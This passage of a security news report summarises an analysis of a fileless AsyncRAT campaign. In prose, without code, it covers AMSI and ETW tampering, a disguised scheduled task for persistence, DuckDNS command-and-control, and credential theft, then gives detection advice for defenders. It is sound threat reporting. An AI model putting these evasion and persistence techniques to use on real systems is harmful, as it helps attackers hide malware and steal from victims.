RAT with evasion and persistence: Once AsyncRAT was loaded, the attackers took steps to disrupt Windows defenses. The report notes techniques such as disabling Anti-malware Scan Interface (AMSI) and tampering with Event Tracking for Windows (ETW), both critical features for runtime detection. To maintain persistence, they created a scheduled task disguised as “Skype Update,” ensuring the RAT would restart after reboots.LevelBlue’s analysis also uncovered AsyncRAT’s encrypted configuration file, secured with AES-256, which contained instructions to connect back to a DuckDNS-based command and control (C2) server. The C2 communication used custom packet formats over TCP, a method typically used for flexibility and evasion.AsyncRAT grants operators access to powerful features: keystroke logging, browser credential theft, clipboard monitoring, and system surveillance. LevelBlue published a list of indicators of compromise (IoC) for defenders to add to their scanners. Additional general best practices may include blocking malicious domains, hunting for PowerShell one-liners and in-memory .NET reflective loads, monitoring for AMSI/ETW tampering, and suspicious scheduled task creation. Threat actors are increasingly leaning toward fileless intrusions, drawn by their quiet execution and reliable results. Earlier this year, attackers were caught using a similar technique, phishing a malicious VBScript that ultimately delivered the popular Remcos RAT in-memory on victim machines.
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4056389/stealthy-asyncrat-flees-the-disk-for-a-fileless-infection.html
